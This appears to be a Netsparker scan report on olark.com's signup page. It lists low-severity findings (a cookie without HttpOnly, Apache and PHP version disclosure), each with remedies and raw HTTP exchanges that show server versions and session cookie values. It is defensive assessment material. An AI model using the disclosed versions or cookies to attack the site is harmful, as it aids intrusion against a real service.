$('.disable-transcripts a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: "Upgrade for Transcripts"}); }); $('.operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('#group_operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.search_for_tooltips a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.shopify_intro_video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); if($.query.get("show_dialog") ) { // create a new dom object and then show the dialog based on this new item // TODO: have a way to hide tooltips var tmp_tooltip = document.createElement("a"); createQtip({ object:tmp_tooltip,..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /signup/create_new_account

/signup/create_new_account CONFIRMED

http://www.olark.com/signup/create_new_account

Identified Cookie

uuid

Request

GET /signup/create_new_account HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.olark.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:55 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "25c7afdb94b8a957ff7c3bb7d143b407"
X-Runtime: 221
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 6151
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid=49534d778ff4143f5d299f7293f5d2dc; path=/; expires=Mon, 04-Jun-2012 21:43:55 GMT,rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIw%0A; path=/,_habla_session_id=2a3dc67515f7c049994fa9afbee82974; path=/
Via: 1.1 web2.local
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <script type='text/javascript'> //<![CDATA[ // KISSmetrics code var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/3225b0c50e306468d63651238f71383a01850728.1.js'); //]]> </script> <title> Olark | Signup </title> <meta content='Real-time chat and monitoring of your website visitors through Google Talk and Jabber' name='description' /> <meta content='Olark, chat, livehelp, livesales, free, website, visitors, website monitoring, visitor monitoring, gtalk' name='keywords' /> <link href='/stylesheets/compiled/screen.css' media='screen, projection' rel='stylesheet' type='text/css' /> <link href='/stylesheets/compiled/print.css' media='print' rel='stylesheet' type='text/css' /> <!--[if IE]><link rel="stylesheet" href="/stylesheets/compiled/ie.css" type="text/css" media="screen, projection"><![endif]--> <link href='/images/sky/common/favicon.ico' rel='shortcut icon' type='image/x-icon' /> <script type='text/javascript'> //<![CDATA[ var gaJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + gaJsHost + "ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js' type='text/javascript'%3E%3C/script%3E")); //]]> </script> <!--[if IE 6]><script type='text/javascript' src="/javascripts/pngfix/DD_belatedPNG.js"></script><![endif]--> <!--[if IE 6]> <script type='text/javascript'> $(document).ready(function(){ DD_belatedPNG.fix('#control_navigation_primary li, .page, .background_container, .one, .two, #thisone, a, img, h1, .button, #top, #bottom'); }); </script> <![endif]--> <script type='text/javascript'> //<![CDATA[ (function(){ window.load_async = function(src, callback){ var a = document.createElement("script"); a.type = "text/javascript"; if(a.readyState){//IE a.onreadystatechange = function(){ if (a.readyState == "loaded" || a.readyState == "complete"){ a.onreadystatechange = null; callback(); } }; }else{//Others a.onload = function(){ callback(); }; } $(document).ready(function(){ a.src = (document.location.protocol == 'https:' ? "https:" : "http:") + "//" + src; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(a,s); }); } })(); //]]> </script> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='3820629337',d=document,l=d.location,c=d.cookie;function f(n){ if(c){var i=c.indexOf(n+'=');if(i>-1){var j=c.indexOf(';',i);return c.substring(i+n. length+1,j<0?c.length:j)}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash; d.write('<sc'+'ript src="'+ 'http'+(l.protocol=='https:'?'s://ssl':'://www')+'.google-analytics.com' +'/siteopt.js?v=1&utmxkey='+k+'&utmx='+(x?x:'')+'&utmxx='+(xx?xx:'')+'&utmxtime=' +new Date().valueOf()+(h?'&utmxhash='+escape(h.substr(1)):'')+ '" type="text/javascript" charset="utf-8"></sc'+'ript>')})(); </script> <!-- End of Google Website Optimizer Control Script --> </head> <body> <div class=' main_background' id='signup'> <div id='fullscreen'> <div class='container'> <a href='/' id='floatinglogo' target='_blank'></a> <div id='top'></div> <div class='page'> <script type='text/javascript'> //<![CDATA[ _kmq.push(['record', 'Viewed Signup Page']); //]]> </script> <div id='login_state'> <h2> Get Excited! </h2> <hr /> <h3> You're about to sign up for the <span class='plan-title'> Free </span> plan! <p> <i> <small> or choose one of our <a href='/signup/plans'> professional plans </a> </small> </i> </p> </h3> <div class='span-16'> <form action="/signup/create_new_account" id="create_new_account" method="post"> <ul class='label-top'> <li class='text required'> <label> Enter your email address <span>*</span> </label> <input type="text" value="" name="user[username]"> </li> <li class='text required'> <label> Pick a username <span>*</span> </label> <input type="text" value="" name="user[email]"> </li> <li class='text required'> <div class='clear'></div> <div class='half-left'> <label> Pick a password <span>*</span> </label> <input id="user_password" name="user[password]" size="30" type="password" /> </div> <div class='half-right'> <label> Re-enter your password <span>*</span> </label> <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" /> </div> <div class='clear'></div> </li> <li class='required'> <i> By clicking 'Continue' I agree to Olark’s <a href='/pages/tos' target='blank'>terms of service</a> <b> <span> * </span> </b> </i> </li> <li class='buttons'> <input class="button green_border" name="commit" type="submit" value="Continue" /> <a class='button blank_border orange' href='/signup/plans'> Choose another plan </a> <div class='clear'></div> </li> <p></p> </ul> </form> </div> <div class='span-6 last'> <div class="testimonial">I am happy I switched shopify.com to Olark. SO much cleaner to integrate with you guys :)<div class="testimonial-attribution">Daniel Weinand<br>shopify.com</div></div><div class="testimonial">Olark is the most powerful thing on the planet I've found to increase conversions<div class="testimonial-attribution">Dane Maxwell<br>paperlesspipeline.com</div></div> </div> </div> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-7433195-1"); gwoTracker._trackPageview("/3820629337/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div> <div id='bottom'></div> </div> </div> </div> <script>var hbl_to_set_username="";</script> <!-- begin olark code --> <script type='text/javascript'> window.olark||(function(c){var f=window,d=document,l=f.location.protocol=="https:"?"https:":"http:",z=c.name,r="load";(function(){f[z]=function(){ (a.s=a.s||[]).push(arguments)};var a=f[z]._={},q=c.methods.length;while(q--){(function(n){f[z][n]=function(){f[z]("call",n,arguments)}})(c.methods[q] )}a.v=0;a.l=c.loader;a.i=arguments.callee;a.f=setTimeout(function(){if(a.f){(new Image).src=l+"//"+a.l.replace(".js",".png")+"&"+escape(f.location.href) }a.f=null},20000);a.p={0:+new Date};a.P=function(u){a.p[u]=new Date-a.p[0]};function s(){a.P(r);f[z](r)}f.addEventListener?f.addEventListener(r,s,false ):f.attachEvent("on"+r,s);(function(){function p(){return["<head></head><",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h, "('script')).",k,"='",l,"//",a.l,"'\"></",i,">"].join("")}var i="body",m=d[i];if(!m){return setTimeout(arguments.callee,100)}a.P(1);var j="appendChild", h="createElement",k="src",n=d[h]("div"),v=n[j](d[h](z)),b=d[h]("iframe"),g="document",e="domain",o;n.style.display="none";m.insertBefore(n,m.firstChild ).id=z;b.frameBorder="0";b.id=z+"-loader";if(/MSIE\s+6/.test(navigator.userAgent)){b.src="javascript:false"}b.allowTransparency="true";v[j](b);try{ b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g]; t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.P(2)})()})()})({loader:(function(m){ return"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script> <!-- end olark code --> <script type='text/javascript'> //<![CDATA[ olark.extend(function(api){ api.chat.updateVisitorNickname({snippet: window.hbl_to_set_username}); }); //]]> </script> <script src="/assets/common.js?1307133378" type="text/javascript"></script> <script type='text/javascript'> //<![CDATA[ (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga); })(); try { window.mpmetrics = new MixpanelLib("0908d20dfe9d3ea7c81e64bb4ffd7d36"); } catch(err) {} //]]> </script> <script type="text/javascript"> adroll_adv_id = "HYX6JMFHEBBHJEIEFT5BJD"; adroll_pix_id = "BP2WER5KN5CGFOUBWKGVKX"; (function () { var oldonload = window.onload; window.onload = function(){ __adroll_loaded=true; var scr = document.createElement("script"); var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adroll.com"); scr.setAttribute('async', 'true'); scr.type = "text/javascript"; scr.src = host + "/j/roundtrip.js"; document.documentElement.firstChild.appendChild(scr); if(oldonload){oldonload()}}; }()); </script> <script> $(document).ready(function(){ window.createQtip = function(kwargs) { var url = kwargs.url; var tooltip_text = kwargs.text; var dom_item = kwargs.object; var caller_controller = 'signup'; var caller_action = 'create_new_account'; var caller_id = ''; if(!url.match(/\?/)){ url += "?"; } url += "&caller_action=" + caller_action; url += "&caller_controller=" + caller_controller; // Add the caller_id if it is defined if(caller_id){ url += "&caller_id=" + caller_id; } $(dom_item).bind('click', function(event){ event.preventDefault(); return false; }).qtip({ content: { // Set the text to an image HTML string with the correct src URL to the loading image you want to use text: 'loading...', url: url, // Use the rel attribute of each element for the url to load title: { text: tooltip_text, // Give the tooltip a title using each elements text button: 'Close' // Show a close link in the title } }, position: { target: $(document.body), // Position it via the document body... corner: 'center' // ...at the center of the viewport }, show: { when: 'click', solo: true, // Only show one tooltip at a time effect: { type: 'fade' } }, hide: 'unfocus', style: { width: { max: 800, min: 750 }, padding: '14px', border: { width: 9, radius: 9, color: '#666666' }, name: 'light' } }); }; //Modal dialog boxes for mini-tutorials $('#todo a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.disable-transcripts a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: "Upgrade for Transcripts"}); }); $('.operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('#group_operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.search_for_tooltips a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.shopify_intro_video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); if($.query.get("show_dialog") ) { // create a new dom object and then show the dialog based on this new item // TODO: have a way to hide tooltips var tmp_tooltip = document.createElement("a"); createQtip({ object:tmp_tooltip, // TODO, append the old controller and action in here url: $.query.get("show_dialog"), text: '' }); $(tmp_tooltip).click(); } // TODO: Move all this javascript somewhere else. //Code for checking whether site.begin_called_at returns true and corresponding UI feedback //generate 2 tooltips initially var failure = document.createElement("a"); var success = document.createElement("a"); createQtip({object: failure, url: "/site/begin_called_at_false", text: "&nbsp;"}); cr..
Apache Version Disclosure

Apache Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /signup/create_new_account

/signup/create_new_account

http://www.olark.com/signup/create_new_account

Extracted Version

2.2.11 (Ubuntu)

Request

GET /signup/create_new_account HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.olark.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:55 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "4984d3b5a9aacb476ca35e832b7ee054"
X-Runtime: 336
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 6153
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid=67ab26df20148a6feeed7cd62a9498b4; path=/; expires=Mon, 04-Jun-2012 21:43:56 GMT,rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIw%0A; path=/,_habla_session_id=c091b2fc37c7c2465e4eba91966d2498; path=/
Via: 1.1 web2.local
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <script type='text/javascript'> //<![CDATA[ // KISSmetrics code var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/3225b0c50e306468d63651238f71383a01850728.1.js'); //]]> </script> <title> Olark | Signup </title> <meta content='Real-time chat and monitoring of your website visitors through Google Talk and Jabber' name='description' /> <meta content='Olark, chat, livehelp, livesales, free, website, visitors, website monitoring, visitor monitoring, gtalk' name='keywords' /> <link href='/stylesheets/compiled/screen.css' media='screen, projection' rel='stylesheet' type='text/css' /> <link href='/stylesheets/compiled/print.css' media='print' rel='stylesheet' type='text/css' /> <!--[if IE]><link rel="stylesheet" href="/stylesheets/compiled/ie.css" type="text/css" media="screen, projection"><![endif]--> <link href='/images/sky/common/favicon.ico' rel='shortcut icon' type='image/x-icon' /> <script type='text/javascript'> //<![CDATA[ var gaJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + gaJsHost + "ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js' type='text/javascript'%3E%3C/script%3E")); //]]> </script> <!--[if IE 6]><script type='text/javascript' src="/javascripts/pngfix/DD_belatedPNG.js"></script><![endif]--> <!--[if IE 6]> <script type='text/javascript'> $(document).ready(function(){ DD_belatedPNG.fix('#control_navigation_primary li, .page, .background_container, .one, .two, #thisone, a, img, h1, .button, #top, #bottom'); }); </script> <![endif]--> <script type='text/javascript'> //<![CDATA[ (function(){ window.load_async = function(src, callback){ var a = document.createElement("script"); a.type = "text/javascript"; if(a.readyState){//IE a.onreadystatechange = function(){ if (a.readyState == "loaded" || a.readyState == "complete"){ a.onreadystatechange = null; callback(); } }; }else{//Others a.onload = function(){ callback(); }; } $(document).ready(function(){ a.src = (document.location.protocol == 'https:' ? "https:" : "http:") + "//" + src; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(a,s); }); } })(); //]]> </script> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='3820629337',d=document,l=d.location,c=d.cookie;function f(n){ if(c){var i=c.indexOf(n+'=');if(i>-1){var j=c.indexOf(';',i);return c.substring(i+n. length+1,j<0?c.length:j)}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash; d.write('<sc'+'ript src="'+ 'http'+(l.protocol=='https:'?'s://ssl':'://www')+'.google-analytics.com' +'/siteopt.js?v=1&utmxkey='+k+'&utmx='+(x?x:'')+'&utmxx='+(xx?xx:'')+'&utmxtime=' +new Date().valueOf()+(h?'&utmxhash='+escape(h.substr(1)):'')+ '" type="text/javascript" charset="utf-8"></sc'+'ript>')})(); </script> <!-- End of Google Website Optimizer Control Script --> </head> <body> <div class=' main_background' id='signup'> <div id='fullscreen'> <div class='container'> <a href='/' id='floatinglogo' target='_blank'></a> <div id='top'></div> <div class='page'> <script type='text/javascript'> //<![CDATA[ _kmq.push(['record', 'Viewed Signup Page']); //]]> </script> <div id='login_state'> <h2> Get Excited! </h2> <hr /> <h3> You're about to sign up for the <span class='plan-title'> Free </span> plan! <p> <i> <small> or choose one of our <a href='/signup/plans'> professional plans </a> </small> </i> </p> </h3> <div class='span-16'> <form action="/signup/create_new_account" id="create_new_account" method="post"> <ul class='label-top'> <li class='text required'> <label> Enter your email address <span>*</span> </label> <input type="text" value="" name="user[username]"> </li> <li class='text required'> <label> Pick a username <span>*</span> </label> <input type="text" value="" name="user[email]"> </li> <li class='text required'> <div class='clear'></div> <div class='half-left'> <label> Pick a password <span>*</span> </label> <input id="user_password" name="user[password]" size="30" type="password" /> </div> <div class='half-right'> <label> Re-enter your password <span>*</span> </label> <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" /> </div> <div class='clear'></div> </li> <li class='required'> <i> By clicking 'Continue' I agree to Olark’s <a href='/pages/tos' target='blank'>terms of service</a> <b> <span> * </span> </b> </i> </li> <li class='buttons'> <input class="button green_border" name="commit" type="submit" value="Continue" /> <a class='button blank_border orange' href='/signup/plans'> Choose another plan </a> <div class='clear'></div> </li> <p></p> </ul> </form> </div> <div class='span-6 last'> <div class="testimonial">Olark is the most powerful thing on the planet I've found to increase conversions<div class="testimonial-attribution">Dane Maxwell<br>paperlesspipeline.com</div></div><div class="testimonial">I am happy I switched shopify.com to Olark. SO much cleaner to integrate with you guys :)<div class="testimonial-attribution">Daniel Weinand<br>shopify.com</div></div> </div> </div> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-7433195-1"); gwoTracker._trackPageview("/3820629337/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div> <div id='bottom'></div> </div> </div> </div> <script>var hbl_to_set_username="";</script> <!-- begin olark code --> <script type='text/javascript'> window.olark||(function(c){var f=window,d=document,l=f.location.protocol=="https:"?"https:":"http:",z=c.name,r="load";(function(){f[z]=function(){ (a.s=a.s||[]).push(arguments)};var a=f[z]._={},q=c.methods.length;while(q--){(function(n){f[z][n]=function(){f[z]("call",n,arguments)}})(c.methods[q] )}a.v=0;a.l=c.loader;a.i=arguments.callee;a.f=setTimeout(function(){if(a.f){(new Image).src=l+"//"+a.l.replace(".js",".png")+"&"+escape(f.location.href) }a.f=null},20000);a.p={0:+new Date};a.P=function(u){a.p[u]=new Date-a.p[0]};function s(){a.P(r);f[z](r)}f.addEventListener?f.addEventListener(r,s,false ):f.attachEvent("on"+r,s);(function(){function p(){return["<head></head><",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h, "('script')).",k,"='",l,"//",a.l,"'\"></",i,">"].join("")}var i="body",m=d[i];if(!m){return setTimeout(arguments.callee,100)}a.P(1);var j="appendChild", h="createElement",k="src",n=d[h]("div"),v=n[j](d[h](z)),b=d[h]("iframe"),g="document",e="domain",o;n.style.display="none";m.insertBefore(n,m.firstChild ).id=z;b.frameBorder="0";b.id=z+"-loader";if(/MSIE\s+6/.test(navigator.userAgent)){b.src="javascript:false"}b.allowTransparency="true";v[j](b);try{ b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g]; t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.P(2)})()})()})({loader:(function(m){ return"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script> <!-- end olark code --> <script type='text/javascript'> //<![CDATA[ olark.extend(function(api){ api.chat.updateVisitorNickname({snippet: window.hbl_to_set_username}); }); //]]> </script> <script src="/assets/common.js?1307133378" type="text/javascript"></script> <script type='text/javascript'> //<![CDATA[ (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga); })(); try { window.mpmetrics = new MixpanelLib("0908d20dfe9d3ea7c81e64bb4ffd7d36"); } catch(err) {} //]]> </script> <script type="text/javascript"> adroll_adv_id = "HYX6JMFHEBBHJEIEFT5BJD"; adroll_pix_id = "BP2WER5KN5CGFOUBWKGVKX"; (function () { var oldonload = window.onload; window.onload = function(){ __adroll_loaded=true; var scr = document.createElement("script"); var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adroll.com"); scr.setAttribute('async', 'true'); scr.type = "text/javascript"; scr.src = host + "/j/roundtrip.js"; document.documentElement.firstChild.appendChild(scr); if(oldonload){oldonload()}}; }()); </script> <script> $(document).ready(function(){ window.createQtip = function(kwargs) { var url = kwargs.url; var tooltip_text = kwargs.text; var dom_item = kwargs.object; var caller_controller = 'signup'; var caller_action = 'create_new_account'; var caller_id = ''; if(!url.match(/\?/)){ url += "?"; } url += "&caller_action=" + caller_action; url += "&caller_controller=" + caller_controller; // Add the caller_id if it is defined if(caller_id){ url += "&caller_id=" + caller_id; } $(dom_item).bind('click', function(event){ event.preventDefault(); return false; }).qtip({ content: { // Set the text to an image HTML string with the correct src URL to the loading image you want to use text: 'loading...', url: url, // Use the rel attribute of each element for the url to load title: { text: tooltip_text, // Give the tooltip a title using each elements text button: 'Close' // Show a close link in the title } }, position: { target: $(document.body), // Position it via the document body... corner: 'center' // ...at the center of the viewport }, show: { when: 'click', solo: true, // Only show one tooltip at a time effect: { type: 'fade' } }, hide: 'unfocus', style: { width: { max: 800, min: 750 }, padding: '14px', border: { width: 9, radius: 9, color: '#666666' }, name: 'light' } }); }; //Modal dialog boxes for mini-tutorials $('#todo a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.disable-transcripts a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: "Upgrade for Transcripts"}); }); $('.operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('#group_operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.search_for_tooltips a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.shopify_intro_video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); if($.query.get("show_dialog") ) { // create a new dom object and then show the dialog based on this new item // TODO: have a way to hide tooltips var tmp_tooltip = document.createElement("a"); createQtip({ object:tmp_tooltip, // TODO, append the old controller and action in here url: $.query.get("show_dialog"), text: '' }); $(tmp_tooltip).click(); } // TODO: Move all this javascript somewhere else. //Code for checking whether site.begin_called_at returns true and corresponding UI feedback //generate 2 tooltips initially var failure = document.createElement("a"); var success = document.createElement("a"); createQtip({object: failure, url: "/site/begin_called_at_false", text: "&nbsp;"}); cr..
PHP Version Disclosure

PHP Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /signup/create_new_account

/signup/create_new_account

http://www.olark.com/signup/create_new_account

Extracted Version

PHP/5.2.10

Request

GET /signup/create_new_account HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.olark.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:55 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "4984d3b5a9aacb476ca35e832b7ee054"
X-Runtime: 336
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 6153
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid=67ab26df20148a6feeed7cd62a9498b4; path=/; expires=Mon, 04-Jun-2012 21:43:56 GMT,rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIw%0A; path=/,_habla_session_id=c091b2fc37c7c2465e4eba91966d2498; path=/
Via: 1.1 web2.local
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


